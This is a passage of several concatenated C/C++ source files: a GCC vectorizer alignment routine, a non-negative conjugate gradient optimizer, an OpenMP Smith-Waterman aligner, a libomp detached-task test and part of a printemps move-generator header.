if (TREE_STATIC (decl))
return (alignment <= MAX_OFILE_ALIGNMENT);
else
return (alignment <= MAX_STACK_ALIGNMENT);
}
/* Return whether the data reference DR is supported with respect to its
alignment.
If CHECK_ALIGNED_ACCESSES is TRUE, check if the access is supported even
if it is aligned, i.e., check if it is possible to vectorize it with a
different alignment. */
enum dr_alignment_support
vect_supportable_dr_alignment (struct data_reference *dr,
bool check_aligned_accesses)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
machine_mode mode = TYPE_MODE (vectype);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct loop *vect_loop = NULL;
bool nested_in_vect_loop = false;
if (aligned_access_p (dr) && !check_aligned_accesses)
return dr_aligned;
/* For now assume all conditional loads/stores support unaligned
access without any special code. */
if (is_gimple_call (stmt)
&& gimple_call_internal_p (stmt)
&& (gimple_call_internal_fn (stmt) == IFN_MASK_LOAD
|| gimple_call_internal_fn (stmt) == IFN_MASK_STORE))
return dr_unaligned_supported;
if (loop_vinfo)
{
vect_loop = LOOP_VINFO_LOOP (loop_vinfo);
nested_in_vect_loop = nested_in_vect_loop_p (vect_loop, stmt);
}
/* Possibly unaligned access. */
/* We can choose between using the implicit realignment scheme (generating
a misaligned_move stmt) and the explicit realignment scheme (generating
aligned loads with a REALIGN_LOAD). There are two variants to the
explicit realignment scheme: optimized, and unoptimized.
We can optimize the realignment only if the step between consecutive
vector loads is equal to the vector size. Since the vector memory
accesses advance in steps of VS (Vector Size) in the vectorized loop, it
is guaranteed that the misalignment amount remains the same throughout the
execution of the vectorized loop. Therefore, we can create the
"realignment token" (the permutation mask that is passed to REALIGN_LOAD)
at the loop preheader.
However, in the case of outer-loop vectorization, when vectorizing a
memory access in the inner-loop nested within the LOOP that is now being
vectorized, while it is guaranteed that the misalignment of the
vectorized memory access will remain the same in different outer-loop
iterations, it is *not* guaranteed that it will remain the same throughout
the execution of the inner-loop. This is because the inner-loop advances
with the original scalar step (and not in steps of VS). If the inner-loop
step happens to be a multiple of VS, then the misalignment remains fixed
and we can use the optimized realignment scheme. For example:
for (i=0; i<N; i++)
for (j=0; j<M; j++)
s += a[i+j];
When vectorizing the i-loop in the above example, the step between
consecutive vector loads is 1, and so the misalignment does not remain
fixed across the execution of the inner-loop, and the realignment cannot
be optimized (as illustrated in the following pseudo vectorized loop):
for (i=0; i<N; i+=4)
for (j=0; j<M; j++){
vs += vp[i+j]; // misalignment of &vp[i+j] is {0,1,2,3,0,1,2,3,...}
// when j is {0,1,2,3,4,5,6,7,...} respectively.
// (assuming that we start from an aligned address).
}
We therefore have to use the unoptimized realignment scheme:
for (i=0; i<N; i+=4)
for (j=k; j<M; j+=4)
vs += vp[i+j]; // misalignment of &vp[i+j] is always k (assuming
// that the misalignment of the initial address is
// 0).
The loop can then be vectorized as follows:
for (k=0; k<4; k++){
rt = get_realignment_token (&vp[k]);
for (i=0; i<N; i+=4){
v1 = vp[i+k];
for (j=k; j<M; j+=4){
v2 = vp[i+j+VS-1];
va = REALIGN_LOAD <v1,v2,rt>;
vs += va;
v1 = v2;
}
}
} */
if (DR_IS_READ (dr))
{
bool is_packed = false;
tree type = (TREE_TYPE (DR_REF (dr)));
if (optab_handler (vec_realign_load_optab, mode) != CODE_FOR_nothing
&& (!targetm.vectorize.builtin_mask_for_load
|| targetm.vectorize.builtin_mask_for_load ()))
{
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
if ((nested_in_vect_loop
&& (TREE_INT_CST_LOW (DR_STEP (dr))
!= GET_MODE_SIZE (TYPE_MODE (vectype))))
|| !loop_vinfo)
return dr_explicit_realign;
else
return dr_explicit_realign_optimized;
}
if (!known_alignment_for_access_p (dr))
is_packed = not_size_aligned (DR_REF (dr));
if ((TYPE_USER_ALIGN (type) && !is_packed)
|| targetm.vectorize.
support_vector_misalignment (mode, type,
DR_MISALIGNMENT (dr), is_packed))
/* Can't software pipeline the loads, but can at least do them. */
return dr_unaligned_supported;
}
else
{
bool is_packed = false;
tree type = (TREE_TYPE (DR_REF (dr)));
if (!known_alignment_for_access_p (dr))
is_packed = not_size_aligned (DR_REF (dr));
if ((TYPE_USER_ALIGN (type) && !is_packed)
|| targetm.vectorize.
support_vector_misalignment (mode, type,
DR_MISALIGNMENT (dr), is_packed))
return dr_unaligned_supported;
}
/* Unsupported. */
return dr_unaligned_unsupported;
}
|
nonnegcg.c | /* Non-negative conjugate gradient optimizer
Minimizes a function subject to non-negativity constraints on all the variables,
using a modified Polak-Ribiere-Polyak conjugate gradient method. Implementation
is based on the paper:
Li, C. (2013). A conjugate gradient type method for the nonnegative constraints optimization problems. Journal of Applied Mathematics, 2013.
BSD 2-Clause License
Copyright (c) 2019, David Cortes
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <math.h>
#include <stdlib.h>
#include <stddef.h>
#include <limits.h>
#ifndef _FOR_R
#include <stdio.h>
#else
#include <R_ext/Print.h>
#define printf Rprintf
#define fprintf(f, message) REprintf(message)
#endif
#ifdef _OPENMP
#include <omp.h>
#endif
#ifdef _FOR_PYTHON
#include "findblas.h"
#elif defined(_FOR_R)
#include <R_ext/BLAS.h>
double cblas_ddot(int n, double *x, int incx, double *y, int incy) { return ddot_(&n, x, &incx, y, &incy); }
void cblas_daxpy(int n, double a, double *x, int incx, double *y, int incy) { daxpy_(&n, &a, x, &incx, y, &incy); }
void cblas_dscal(int n, double alpha, double *x, int incx) { dscal_(&n, &alpha, x, &incx); }
#else
#include "blasfuns.h"
#endif
/* Aliasing for compiler optimizations */
#ifdef __cplusplus
#if defined(__GNUG__) || defined(__GNUC__) || defined(_MSC_VER) || defined(__clang__) || defined(__INTEL_COMPILER)
#define restrict __restrict
#else
#define restrict
#endif
#elif defined(_MSC_VER)
#define restrict __restrict
#elif !defined(__STDC_VERSION__) || (__STDC_VERSION__ < 199901L)
#define restrict
#endif
/* OpenMP < 3.0 (e.g. MSVC as of 2019) does not support parallel for's with unsigned iterators,
and does not support declaring the iterator type in the loop itself */
#ifdef _OPENMP
#if (_OPENMP > 200801) && !defined(_WIN32) && !defined(_WIN64) /* OpenMP >= 3.0: iterator type can be declared in the loop */
#define size_t_for size_t
#else
#define size_t_for
#endif
#else
#define size_t_for size_t
#endif
#ifndef isnan
#ifdef _isnan
#define isnan _isnan
#else
#define isnan(x) ( (x) != (x) )
#endif
#endif
#ifndef isinf
#ifdef _finite
#define isinf(x) (!_finite(x))
#else
#define isinf(x) ( (x) >= HUGE_VAL || (x) <= -HUGE_VAL )
#endif
#endif
#define get_curr_ix_rotation(ix, n) ( ((ix) == 0) ? 0 : (n) )
#define incr_ix_rotation(ix) ( ((ix) == 0)? 1 : 0 )
#define square(x) ( (x) * (x) )
#define nonneg(x) ((x) > 0)? (x) : 0
typedef void fun_eval(double x[], int n, double *f, void *data);
typedef void grad_eval(double x[], int n, double grad[], void *data);
typedef void callback(double x[], int n, double f, size_t iter, void *data);
typedef enum cg_result {tol_achieved = 0, stop_maxnfeval = 1, stop_maxiter = 2, out_of_mem = 3} cg_result;
/* Non-negative conjugate gradient optimizer
Minimizes a function subject to non-negativity constraints on all the variables,
using a modified Polak-Ribiere-Polyak conjugate gradient method. Implementation
is based on the paper:
Li, C. (2013). A conjugate gradient type method for the nonnegative constraints optimization problems. Journal of Applied Mathematics, 2013.
x (in, out) : At input, starting point (must be a feasible point). At output, optimal values calculated by the optimizer.
n : Number of variables in the optimization problem
fun_val (out) : Value of the function achieved at the end of the procedure
obj_fun : function that calculates the objective value (must be written into the *f pointer passed to it)
grad_fun : function that calculates the gradient (must be written into the grad[] array passed to it)
cb : callback function to execute at the end of each iteration
data : Extra data to pass to the functions that evaluate objective, gradient, and callback (must be cast to void pointer)
tol : Tolerance for <gradient, direction>
(Recommended: <1e-3)
maxnfeval : Maximum number of function evaluations
(Recommended: >1000)
maxiter : Maximum number of CG iterations to run
(Recommended: >100, but note that steps are always feasible descent directions)
niter (out) : Number of CG iterations performed
nfeval (out) : Number of function evaluations performed
decr_lnsrch : Number by which to decrease the step size after each unsuccessful line search
(Recommended: 0.5)
lnsrch_const : Acceptance parameter for the line search procedure
(Recommended: 0.01)
max_ls : Maximum number of line search trials per iteration
(Recommended: 20)
extra_nonneg_tol: Ensure extra non-negative tolerance by explicitly setting elements that are <=0 to zero at each iteration
(Recommended: 0)
buffer_arr : Array of dimension (4*n). If NULL is passed, it is allocated and freed internally.
nthreads : Number of parallel threads to use
verbose : Whether to print convergence messages
*/
int minimize_nonneg_cg(double *restrict x, int n, double *fun_val,
fun_eval *obj_fun, grad_eval *grad_fun, callback *cb, void *data,
double tol, size_t maxnfeval, size_t maxiter, size_t *niter, size_t *nfeval,
double decr_lnsrch, double lnsrch_const, size_t max_ls,
int extra_nonneg_tol, double *buffer_arr, int nthreads, int verbose)
{
double max_step;
double direction_norm_sq;
double grad_prev_norm_sq;
double prod_grad_dir;
double theta;
double beta;
double curr_fun_val;
double new_fun_val;
obj_fun(x, n, &curr_fun_val, data);
*nfeval = 1;
int dealloc_buffer = 0;
int revert_x = 0;
size_t ls;
cg_result return_value = stop_maxiter;
if ( maxiter == 0 ) { maxiter = INT_MAX; } /* these counters are unsigned: zero means no limit */
if ( maxnfeval == 0 ) { maxnfeval = INT_MAX; }
#if defined(_OPENMP) && ((_OPENMP < 200801) || defined(_WIN32) || defined(_WIN64)) /* OpenMP < 3.0 */
long i;
long n_szt = n;
#else
size_t n_szt = (size_t) n;
#endif
/* algorithm requires current and previous gradient and search direction, so the index
at which they are written in the array is rotated each iteration to avoid unnecessary copies */
int ix_rotation = 0;
if (buffer_arr == NULL)
{
buffer_arr = (double*) malloc(sizeof(double) * n * 4);
dealloc_buffer = 1;
if (buffer_arr == NULL)
{
fprintf(stderr, "Could not allocate memory for optimization procedure\n");
return out_of_mem;
}
}
double *grad_curr_n_prev = buffer_arr;
double *direction_curr_n_prev = buffer_arr + 2 * n;
double *restrict direction_curr = direction_curr_n_prev;
double *restrict grad_curr = grad_curr_n_prev;
double *restrict direction_prev;
double *restrict grad_prev;
/* set number of BLAS threads */
#if defined(_MKL_H_)
mkl_set_num_threads_local(nthreads);
#elif defined(CBLAS_H)
openblas_set_num_threads(nthreads);
#endif
if (verbose)
{
printf("********************************************\n");
printf("Non-negative Conjugate Gradient Optimization\n\n");
printf("Number of variables to optimize: %d\n", n);
if (maxiter == INT_MAX && maxnfeval == INT_MAX) {printf("[Warning: no limit on iterations and function evaluations passed]\n");}
printf("Initial function value: %10.4f\n\n", curr_fun_val);
}
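/* Each iteration below builds the modified Polak-Ribiere-Polyak direction
of Li (2013). On the free variables (x[i] > 0):
d_k = -g_k + beta * d_{k-1} - theta * (g_k - g_{k-1})
beta = g_k' (g_k - g_{k-1}) / ||g_{k-1}||^2
theta = g_k' d_{k-1} / ||g_{k-1}||^2
while variables at the bound (x[i] <= 0) whose gradient points outward get
a zero direction component, so every step stays feasible. */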
for (*niter = 0; *niter < maxiter; (*niter)++)
{
/* get gradient */
grad_fun(x, n, grad_curr, data);
/* determine search direction - this requires 3 passes over 'x' */
/* first pass: get a capped gradient */
#pragma omp parallel for schedule(static) firstprivate(x, direction_curr, grad_curr) num_threads(nthreads)
for (size_t_for i = 0; i < n_szt; i++)
{
direction_curr[i] = (x[i] <= 0 && grad_curr[i] >= 0)? 0 : -grad_curr[i];
}
/* on the first iteration, the capped negative gradient alone is the direction */
if (*niter > 0)
{
/* second pass: calculate beta and theta constants */
theta = 0;
beta = 0;
#if !defined(_WIN32) && !defined(_WIN64)
#pragma omp parallel for schedule(static) firstprivate(x, direction_prev, grad_curr, grad_prev, n_szt) reduction(+:theta, beta) num_threads(nthreads)
#endif
for (size_t_for i = 0; i < n_szt; i++)
{
theta += ( x[i] <= 0 )? 0 : grad_curr[i] * direction_prev[i];
beta += ( x[i] <= 0 )? 0 : grad_curr[i] * (grad_curr[i] - grad_prev[i]);
}
theta /= grad_prev_norm_sq;
beta /= grad_prev_norm_sq;
/* third pass: add to direction info on previous direction and gradient differences */
#pragma omp parallel for schedule(static) firstprivate(x, direction_curr, direction_prev, grad_curr, grad_prev, n_szt, theta, beta) num_threads(nthreads)
for (size_t_for i = 0; i < n_szt; i++)
{
direction_curr[i] += ( x[i] <= 0 )? 0 : beta * direction_prev[i] - theta * (grad_curr[i] - grad_prev[i]);
}
}
/* check if stop criterion is satisfied */
prod_grad_dir = cblas_ddot(n, grad_curr, 1, direction_curr, 1);
if ( fabs(prod_grad_dir) <= tol )
{
return_value = tol_achieved;
goto terminate_procedure;
}
/* determine maximum step size */
max_step = 1.0;
#if defined(_OPENMP)
#if !defined(_WIN32) && !defined(_WIN64)
#pragma omp parallel for schedule(static) firstprivate(x, direction_curr, n_szt) reduction(min: max_step) num_threads(nthreads)
#endif
for (size_t_for i = 0; i < n_szt; i++)
{
max_step = fmin(max_step, (direction_curr[i] < 0)? -x[i] / direction_curr[i] : 1.0); /* accumulate the minimum, matching the serial branch below */
}
max_step = fmin(max_step, 1.0);
#else
for (size_t i = 0; i < n_szt; i++)
{
if (direction_curr[i] < 0) { max_step = fmin(max_step, -x[i] / direction_curr[i]); }
}
#endif
/* perform line search */
cblas_daxpy(n, max_step, direction_curr, 1, x, 1);
direction_norm_sq = cblas_ddot(n, direction_curr, 1, direction_curr, 1);
for (ls = 0; ls < max_ls; ls++)
{
if (extra_nonneg_tol)
{
#pragma omp parallel for schedule(static) firstprivate(x, n_szt) num_threads(nthreads)
for (size_t_for i = 0; i < n_szt; i++){x[i] = nonneg(x[i]);}
}
obj_fun(x, n, &new_fun_val, data);
if ( !isinf(new_fun_val) && !isnan(new_fun_val) )
{
if (new_fun_val <= curr_fun_val - lnsrch_const * square(max_step * pow(decr_lnsrch, ls)) * direction_norm_sq)
{ break; }
}
(*nfeval)++; if (*nfeval >= maxnfeval) { revert_x = 1; return_value = stop_maxnfeval; goto terminate_procedure; }
/* go to new step size by modifying x in-place */
cblas_daxpy(n, max_step * ( pow(decr_lnsrch, ls + 1) - pow(decr_lnsrch, ls) ), direction_curr, 1, x, 1);
}
curr_fun_val = new_fun_val;
if ( cb != NULL) { cb(x, n, curr_fun_val, *niter, data); }
/* update norm of gradient */
grad_prev_norm_sq = cblas_ddot(n, grad_curr, 1, grad_curr, 1);
/* next time, write to the other side of grad and dir arrays */
direction_prev = direction_curr;
grad_prev = grad_curr;
ix_rotation = incr_ix_rotation(ix_rotation);
direction_curr = direction_curr_n_prev + get_curr_ix_rotation(ix_rotation, n);
grad_curr = grad_curr_n_prev + get_curr_ix_rotation(ix_rotation, n);
if (verbose)
{
printf("Iteration %3d : f(x) = %10.4f, |<g(x), d(x)>| = %12.4f, nfev = %3d, ls = %2d\n",
(int) *niter + 1, curr_fun_val, fabs(prod_grad_dir), (int) *nfeval, (int) ls +1 );
}
}
terminate_procedure:
if (dealloc_buffer) { free(buffer_arr); }
if (revert_x)
{
cblas_daxpy(n, -max_step * pow(decr_lnsrch, ls), direction_curr, 1, x, 1);
if (extra_nonneg_tol)
{
#pragma omp parallel for schedule(static) firstprivate(x, n_szt) num_threads(nthreads)
for (size_t_for i = 0; i < n_szt; i++){x[i] = nonneg(x[i]);}
}
}
if (verbose)
{
if (return_value == tol_achieved) { printf("\nTerminated: |<g(x), d(x)>| driven below tol.\n"); }
if (return_value == stop_maxnfeval) { printf("\nTerminated: reached maximum number of function evaluations\n"); }
if (return_value == stop_maxiter) { printf("\nTerminated: reached maximum number of iterations\n"); }
printf("Last f(x) = %10.4f\n\n", curr_fun_val);
}
*fun_val = curr_fun_val;
return (int) return_value;
}
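/* A minimal usage sketch (illustration only, not part of the library):
minimizing f(x) = ||x - c||^2 where c has a negative entry, so the
constrained optimum clips that coordinate at zero. The demo objective,
gradient, and chosen tolerances are assumptions made for this example. */
#ifdef NONNEG_CG_USAGE_DEMO
static const double demo_c[3] = {1.0, -2.0, 3.0};
static void demo_obj(double x[], int n, double *f, void *data)
{
(void) data; /* unused */
*f = 0.0;
for (int i = 0; i < n; i++) *f += square(x[i] - demo_c[i]);
}
static void demo_grad(double x[], int n, double grad[], void *data)
{
(void) data; /* unused */
for (int i = 0; i < n; i++) grad[i] = 2.0 * (x[i] - demo_c[i]);
}
int main(void)
{
double x[3] = {0.5, 0.5, 0.5}; /* feasible (non-negative) start */
double fun_val;
size_t niter, nfeval;
int res = minimize_nonneg_cg(x, 3, &fun_val, demo_obj, demo_grad,
NULL, NULL, 1e-8, 1000, 100,
&niter, &nfeval, 0.5, 0.01, 20,
0, NULL, 1, 1);
/* expect x close to {1, 0, 3}: the negative target is clipped at zero */
printf("status %d: x = {%g, %g, %g}\n", res, x[0], x[1], x[2]);
return 0;
}
#endif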
|
code.c | #include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <omp.h>
#define RESET "\033[0m"
#define BOLDRED "\033[1m\033[31m" /* Bold Red */
#define PATH -1
#define NONE 0
#define UP 1
#define LEFT 2
#define DIAGONAL 3
void similarityScore(long long int i, long long int j, int* H, int* P, long long int* maxPos);
int matchMissmatchScore(long long int i, long long int j);
void backtrack(int* P, long long int maxPos);
void printMatrix(int* matrix);
void printPredecessorMatrix(int* matrix);
void generate(void);
long long int m = 11; //Columns - Size of string a
long long int n = 7; //Lines - Size of string b
int matchScore = 5;
int missmatchScore = -3;
int gapScore = -4;
char *a, *b;
int main(int argc, char* argv[]) {
if (argc < 4) {
fprintf(stderr, "Usage: %s <threads> <columns> <lines>\n", argv[0]);
return 1;
}
int thread_count = strtoll(argv[1], NULL, 10);
m = strtoll(argv[2], NULL, 10);
n = strtoll(argv[3], NULL, 10);
#ifdef DEBUG
printf("\nMatrix[%lld][%lld]\n", n, m);
#endif
a = malloc((m + 1) * sizeof(char)); //+1: generate() fills m+1 chars once m is incremented below
b = malloc((n + 1) * sizeof(char));
m++;
n++;
int *H;
H = calloc(m * n, sizeof(int));
int *P;
P = calloc(m * n, sizeof(int));
generate();
long long int maxPos = 0;
long long int i, j;
double Time=0.0;
double initialTime = omp_get_wtime();
//wavefront fill: H[i][j] depends on H[i-1][j], H[i][j-1] and H[i-1][j-1],
//so a flat collapse(2) loop over the matrix would race; cells on the same
//anti-diagonal d = i + j are independent and can be computed in parallel
long long int d;
for (d = 2; d <= (n - 1) + (m - 1); d++) {
long long int iMin = (d - (m - 1) > 1) ? d - (m - 1) : 1;
long long int iMax = (d - 1 < n - 1) ? d - 1 : n - 1;
#pragma omp parallel for shared(H, P, maxPos) private(i, j) num_threads(thread_count)
for (i = iMin; i <= iMax; i++) {
j = d - i;
similarityScore(i, j, H, P, &maxPos);
}
}
backtrack(P, maxPos);
double finalTime = omp_get_wtime();
Time+=(double)(finalTime - initialTime);
#ifdef DEBUG
printf("\nSimilarity Matrix:\n");
printMatrix(H);
printf("\nPredecessor Matrix:\n");
printPredecessorMatrix(P);
printf("\nElapsed time: %f\n\n", Time);
#endif
free(H);
free(P);
free(a);
free(b);
return 0;
}
void similarityScore(long long int i, long long int j, int* H, int* P, long long int* maxPos) {
int up, left, diag;
long long int index = m * i + j;
up = H[index - m] + gapScore;
left = H[index - 1] + gapScore;
diag = H[index - m - 1] + matchMissmatchScore(i, j);
int max = NONE;
int pred = NONE;
if (diag > max) { //same letter ↖
max = diag;
pred = DIAGONAL;
}
if (up > max) { //remove letter ↑
max = up;
pred = UP;
}
if (left > max) { //insert letter ←
max = left;
pred = LEFT;
}
H[index] = max;
P[index] = pred;
if (max > H[*maxPos]) { //candidate global maximum
#pragma omp critical
{
if (max > H[*maxPos]) //re-check: another thread may have updated maxPos
*maxPos = index;
}
}
}
int matchMissmatchScore(long long int i, long long int j) {
if (a[j-1] == b[i-1])
return matchScore;
else
return missmatchScore;
}
void backtrack(int* P, long long int maxPos) {
long long int predPos = maxPos; //safe default when the start cell has no predecessor
do {
if(P[maxPos] == DIAGONAL)
predPos = maxPos - m - 1;
else if(P[maxPos] == UP)
predPos = maxPos - m;
else if(P[maxPos] == LEFT)
predPos = maxPos - 1;
P[maxPos]*=PATH;
maxPos = predPos;
} while(P[maxPos] != NONE);
}
void printMatrix(int* matrix) {
long long int i, j;
for (i = 0; i < n; i++) { //Lines
for (j = 0; j < m; j++) {
printf("%d\t", matrix[m * i + j]);
}
printf("\n");
}
}
void printPredecessorMatrix(int* matrix) {
long long int i, j, index;
for (i = 0; i < n; i++) { //Lines
for (j = 0; j < m; j++) {
index = m * i + j;
if(matrix[index] < 0) {
printf(BOLDRED);
if (matrix[index] == -UP)
printf("↑ ");
else if (matrix[index] == -LEFT)
printf("← ");
else if (matrix[index] == -DIAGONAL)
printf("↖ ");
else
printf("- ");
printf(RESET);
} else {
if (matrix[index] == UP)
printf("↑ ");
else if (matrix[index] == LEFT)
printf("← ");
else if (matrix[index] == DIAGONAL)
printf("↖ ");
else
printf("- ");
}
}
printf("\n");
}
}
void generate(){
long long int i;
for(i=0;i<m;i++){
int aux=rand()%4;
if(aux==0)
a[i]='A';
else if(aux==2)
a[i]='C';
else if(aux==3)
a[i]='G';
else
a[i]='T';
}
for(i=0;i<n;i++){
int aux=rand()%4;
if(aux==0)
b[i]='A';
else if(aux==2)
b[i]='C';
else if(aux==3)
b[i]='G';
else
b[i]='T';
}
}
|
kmp_detach_tasks_t1.c | // RUN: %libomp-compile && env OMP_NUM_THREADS='3' %libomp-run
// RUN: %libomp-compile && env OMP_NUM_THREADS='1' %libomp-run
// REQUIRES: !abt
#include <stdio.h>
#include <omp.h>
#include "omp_my_sleep.h"
// detached untied
#define PTASK_FLAG_DETACHABLE 0x40
// OpenMP RTL interfaces
typedef unsigned long long kmp_uint64;
typedef long long kmp_int64;
typedef struct ID {
int reserved_1;
int flags;
int reserved_2;
int reserved_3;
char *psource;
} id;
// Compiler-generated code (emulation)
typedef struct ident {
void* dummy; // not used in the library
} ident_t;
typedef enum kmp_event_type_t {
KMP_EVENT_UNINITIALIZED = 0,
KMP_EVENT_ALLOW_COMPLETION = 1
} kmp_event_type_t;
typedef struct {
kmp_event_type_t type;
union {
void *task;
} ed;
} kmp_event_t;
typedef struct shar { // shareds used in the task
} *pshareds;
typedef struct task {
pshareds shareds;
int(*routine)(int,struct task*);
int part_id;
// void *destructor_thunk; // optional, needs flag setting if provided
// int priority; // optional, needs flag setting if provided
// ------------------------------
// privates used in the task:
omp_event_handle_t evt;
} *ptask, kmp_task_t;
typedef int(*task_entry_t)(int, ptask);
#ifdef __cplusplus
extern "C" {
#endif
extern int __kmpc_global_thread_num(void *id_ref);
extern ptask __kmpc_omp_task_alloc(id *loc, int gtid, int flags,
size_t sz, size_t shar, task_entry_t rtn);
extern int __kmpc_omp_task(id *loc, int gtid, ptask task);
extern omp_event_handle_t __kmpc_task_allow_completion_event(
ident_t *loc_ref, int gtid, ptask task);
#ifdef __cplusplus
}
#endif
int volatile checker;
// User's code, outlined into task entry
int task_entry(int gtid, ptask task) {
checker = 1;
return 0;
}
int main() {
int i, j, gtid = __kmpc_global_thread_num(NULL);
int nt = omp_get_max_threads();
ptask task;
pshareds psh;
checker = 0;
omp_set_dynamic(0);
#pragma omp parallel //num_threads(N)
{
#pragma omp master
{
int gtid = __kmpc_global_thread_num(NULL);
omp_event_handle_t evt;
/*
#pragma omp task detach(evt)
{}
*/
task = (ptask)__kmpc_omp_task_alloc(NULL,gtid,PTASK_FLAG_DETACHABLE,sizeof(struct task),sizeof(struct shar),&task_entry);
psh = task->shareds;
evt = (omp_event_handle_t)__kmpc_task_allow_completion_event(NULL,gtid,task);
task->evt = evt;
__kmpc_omp_task(NULL, gtid, task);
my_sleep(2.0);
omp_fulfill_event(evt);
} // end master
} // end parallel
// check results
if (checker == 1) {
printf("passed\n");
return 0;
} else {
printf("failed\n");
return 1;
}
}
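/* For reference (a note added here, not part of the test): with a compiler
implementing OpenMP 5.0, the runtime calls emulated above are what the
detach clause lowers to; the user-level equivalent is roughly:

omp_event_handle_t evt;
#pragma omp task detach(evt)
{ checker = 1; }
my_sleep(2.0);
omp_fulfill_event(evt); // the task only completes once the event is fulfilled
*/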
|
variable_bound_move_generator.h | /*****************************************************************************/
// Copyright (c) 2020-2021 Yuji KOGUMA
// Released under the MIT license
// https://opensource.org/licenses/mit-license.php
/*****************************************************************************/
#ifndef PRINTEMPS_NEIGHBORHOOD_VARIABLE_BOUND_MOVE_MOVE_GENERATOR_H__
#define PRINTEMPS_NEIGHBORHOOD_VARIABLE_BOUND_MOVE_MOVE_GENERATOR_H__
#include "abstract_move_generator.h"
namespace printemps {
namespace neighborhood {
/*****************************************************************************/
template <class T_Variable, class T_Expression>
class VariableBoundMoveGenerator
: public AbstractMoveGenerator<T_Variable, T_Expression> {
private:
public:
/*************************************************************************/
VariableBoundMoveGenerator(void) {
/// nothing to do
}
/*************************************************************************/
virtual ~VariableBoundMoveGenerator(void) {
/// nothing to do
}
/*************************************************************************/
void setup(const std::vector<model_component::Constraint<
T_Variable, T_Expression> *> &a_RAW_CONSTRAINT_PTRS) {
/**
* Exclude constraints which contain fixed variables or selection
* variables.
*/
auto constraint_ptrs =
extract_effective_constraint_ptrs(a_RAW_CONSTRAINT_PTRS);
/**
* Convert constraint objects to BinomialConstraint objects.
*/
auto binomials = convert_to_binomial_constraints(constraint_ptrs);
/**
* Setup move objects.
*/
const int BINOMIALS_SIZE = binomials.size();
this->m_moves.resize(4 * BINOMIALS_SIZE);
this->m_flags.resize(4 * BINOMIALS_SIZE);
for (auto i = 0; i < BINOMIALS_SIZE; i++) {
auto &move = this->m_moves[4 * i];
move.sense = MoveSense::VariableBound;
move.alterations.emplace_back(binomials[i].variable_ptr_first, 0);
move.alterations.emplace_back(binomials[i].variable_ptr_second, 0);
move.is_univariable_move = false;
move.is_selection_move = false;
utility::update_union_set(
&(move.related_constraint_ptrs),
binomials[i].variable_ptr_first->related_constraint_ptrs());
utility::update_union_set(
&(move.related_constraint_ptrs),
binomials[i].variable_ptr_second->related_constraint_ptrs());
move.is_special_neighborhood_move = true;
move.is_available = true;
move.overlap_rate = 0.0;
this->m_moves[4 * i + 1] = move;
this->m_moves[4 * i + 2] = move;
this->m_moves[4 * i + 3] = move;
}
/**
* Setup move updater.
*/
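/**
* Each binomial constraint a_1 x_1 + a_2 x_2 + c (<= or >=) 0 yields the
* four moves updated below: perturb one variable by +/-1 and reset the
* other to the boundary value, e.g. x_2 = (-c - a_1 x_1) / a_2, rounded
* by floor or ceil toward the feasible side according to the sign of the
* coefficient and the constraint sense.
*/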
auto move_updater = //
[this, binomials, BINOMIALS_SIZE](
auto * a_moves_ptr, //
auto * a_flags, //
const bool a_ACCEPT_ALL, //
const bool a_ACCEPT_OBJECTIVE_IMPROVABLE, //
const bool a_ACCEPT_FEASIBILITY_IMPROVABLE, //
[[maybe_unused]] const bool a_IS_ENABLED_PARALLEL) {
#ifdef _OPENMP
#pragma omp parallel for if (a_IS_ENABLED_PARALLEL) schedule(static)
#endif
for (auto i = 0; i < BINOMIALS_SIZE; i++) {
{
auto index = 4 * i;
auto &alterations = (*a_moves_ptr)[index].alterations;
T_Variable target = 0;
double target_temp =
(-binomials[i].constant_value -
binomials[i].sensitivity_first *
(binomials[i].variable_ptr_first->value() +
1)) /
binomials[i].sensitivity_second;
if ((binomials[i].sensitivity_second > 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Less) ||
(binomials[i].sensitivity_second < 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Greater)) {
target = static_cast<T_Variable>(
std::floor(target_temp));
} else {
target =
static_cast<T_Variable>(std::ceil(target_temp));
}
alterations[0].second =
binomials[i].variable_ptr_first->value() + 1;
alterations[1].second = target;
}
{
auto index = 4 * i + 1;
auto &alterations = (*a_moves_ptr)[index].alterations;
T_Variable target = 0;
double target_temp =
(-binomials[i].constant_value -
binomials[i].sensitivity_first *
(binomials[i].variable_ptr_first->value() -
1)) /
binomials[i].sensitivity_second;
if ((binomials[i].sensitivity_second > 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Less) ||
(binomials[i].sensitivity_second < 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Greater)) {
target = static_cast<T_Variable>(
std::floor(target_temp));
} else {
target =
static_cast<T_Variable>(std::ceil(target_temp));
}
alterations[0].second =
binomials[i].variable_ptr_first->value() - 1;
alterations[1].second = target;
}
{
auto index = 4 * i + 2;
auto &alterations = (*a_moves_ptr)[index].alterations;
T_Variable target = 0;
double target_temp =
